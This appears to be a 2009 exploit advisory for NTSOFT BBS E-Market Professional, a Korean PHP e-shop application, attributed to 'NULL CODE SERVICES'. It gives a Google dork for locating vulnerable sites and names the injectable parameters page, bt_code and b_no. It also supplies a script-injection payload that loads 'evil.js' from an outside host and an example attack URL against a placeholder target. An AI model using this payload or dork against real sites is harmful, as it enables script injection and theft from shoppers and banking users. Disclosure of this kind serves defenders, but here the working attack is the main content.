+==========================================================================+
+          NTSOFT  BBS E-Market Professional  & XSS - Remote Evil Java     +
+==========================================================================+


Author(s): Ivan Sanchez 

Product: BBS E-Market Professional

Vendor Overview: NTSOFT
Vendor Homepage: http://www.nt.co.kr/  
                 http://www.bbs2000.co.kr/

Date: 29/07/2009


"most off all korean sites that handle e-shop , e-banking,... use this software"


Description:
------------

BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The issue presents itself due to improper validation of user-supplied data. 


"In the past the same software had a lot of bugs in others parameters & versions"


GOOGLE DORKS:
------------

intext: "Copyright (c) 2003 NTSOFT All rights reserved"



Parameters affected:
-------------------

page= evil.js
bt_code= evil.js
b_no= evil.js



Evil Code to put:
-----------------

Example:  "><script src=http://site/scripts/evil.js></script> 


Example URl:

http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code




NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+          NTSOFT  BBS E-Market Professional  & XSS - Remote Evil Java     +
+==========================================================================+